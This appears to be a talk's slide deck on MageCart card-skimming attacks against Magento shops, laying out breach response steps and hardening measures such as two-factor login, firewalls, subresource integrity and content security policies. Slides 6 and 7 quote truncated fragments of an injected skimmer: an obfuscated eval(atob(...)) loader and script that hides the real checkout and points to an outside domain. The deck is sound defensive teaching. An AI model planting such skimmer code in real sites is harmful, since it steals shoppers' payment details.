Locking down your Magento store

Slide 1

Slide 1 text

Locking down your Magento Shop Tom Robertshaw @bobbyshaw

Slide 2

Slide 2 text

And 10,000s more. MageCart

Slide 3

Slide 3 text

● 20 lines of JS ● Duplicates form submissions to dead-drop. ● Invisible to merchant and customer. MageCart

Slide 4

Slide 4 text

Dude, where’s my checkout?

Slide 5

Slide 5 text

“The checkout’s broken” “Wait a minute, that’s not our checkout.” Identify

Slide 6

Slide 6 text

eval(atob("ZnVuY3Rpb24gc2V0QzAxKG5hbWUsdmFsdWUsZGF5...”)); Identify

Slide 7

Slide 7 text

if (document.title == "One Step Checkout | Merchant Name") { var __gt2 = "https://api-secure-checkout.com" ; var __b0 = document.body; __b0.insertAdjacentHTML('beforebegin', ''); __b0.style.display = "none"; } Identify

Slide 8

Slide 8 text

● Admin User ○ Name, Email, Changed and Updated At ● Misc Scripts Config ○ The breach Preserve

Slide 9

Slide 9 text

● Delete Admin User ● Remove script from Misc Scripts Config ● Review and Redeploy all files Remove Hack

Slide 10

Slide 10 text

‍♀ ● When? ● What? ● How? Investigate

Slide 11

Slide 11 text

● Admin actions log ● Web server access log 216.151.184.62 - - [29/Jan/2019:11:30:46 +0000] "GET /downloader/ HTTP/1.1" 200 18034 216.151.184.62 - - [04/Feb/2019:14:48:16 +0000] "GET /index.php/admin/permissions_user/new/key/95bcf8a73ce1ff3535e4ba6d2167760f/ HTTP/1.1" 200 17907 216.151.184.62 - - [04/Feb/2019:15:23:10 +0000] "POST /index.php/admin/system_config/save/section/design/95bcf8a73ce1ff3535e4ba6d2167760f/ HTTP/1.1" 200 Investigate

Slide 12

Slide 12 text

● Code Vulnerability ○ Core, third-party plugins, bespoke plugins ● Admin access ○ Brute force, Infected staff computers ● External software ○ Phpmyadmin (adminer), magmi Investigate

Slide 13

Slide 13 text

● Rotate passwords ● Remove Downloader ● Implement next level of security ○ E.g. IP restricted admin Close Up Breach

Slide 14

Slide 14 text

✉ Report nefarious domain and IP to registrar and host. Close Up Breach

Slide 15

Slide 15 text

● Customers ● ICO ● Payment providers ● Insurers Report

Slide 16

Slide 16 text

Monitor for new breaches. Monitor

Slide 17

Slide 17 text

Security Monitoring https://sansec.io/

Slide 18

Slide 18 text

1. Identify 2. Preserve 3. Remove Hack 4. Investigate 5. Close up breach 6. Report 7. Monitor Breach Response Summary

Slide 19

Slide 19 text

“I use an iframe payment gateway, I’m safe” No one is safe

Slide 20

Slide 20 text

What should you do? How much should you spend?

Slide 21

Slide 21 text

● Fines from Visa & Mastercard ● Increased transaction costs ● Increased business insurance costs ● Fines from ICO ● Loss of business as customers lose trust ● Time & money spent investigating and resolving hack Business Impact

Slide 22

Slide 22 text

Marketing Team vs Security Team Flexibility vs control The Dichotomy

Slide 23

Slide 23 text

● Password management tool ● Two-factor auth or IP whitelisting Admin Security

Slide 24

Slide 24 text

Web application firewall, e.g. Cloudflare Firewalls

Slide 25

Slide 25 text

● Keep core & modules up to date ● Security audit each module Code

Slide 26

Slide 26 text

● Sign your JS where possible. Subresource Integrity

Slide 27

Slide 27 text

Block/Monitor loaded assets Content-Security-Policy-Report-Only: default-src 'self'; report-uri https://test-report.trackcsp.com/v1/494b06af-eb50-4c85-90 97-aa7c31e591b9 Content Security Policies

Slide 28

Slide 28 text

@gwillem Listen to Industry Experts @_talesh

Slide 29

Slide 29 text

Talesh Seeparsan’s Incident Response Template https://github.com/ talesh/response

Slide 30

Slide 30 text

Thanks @bobbyshaw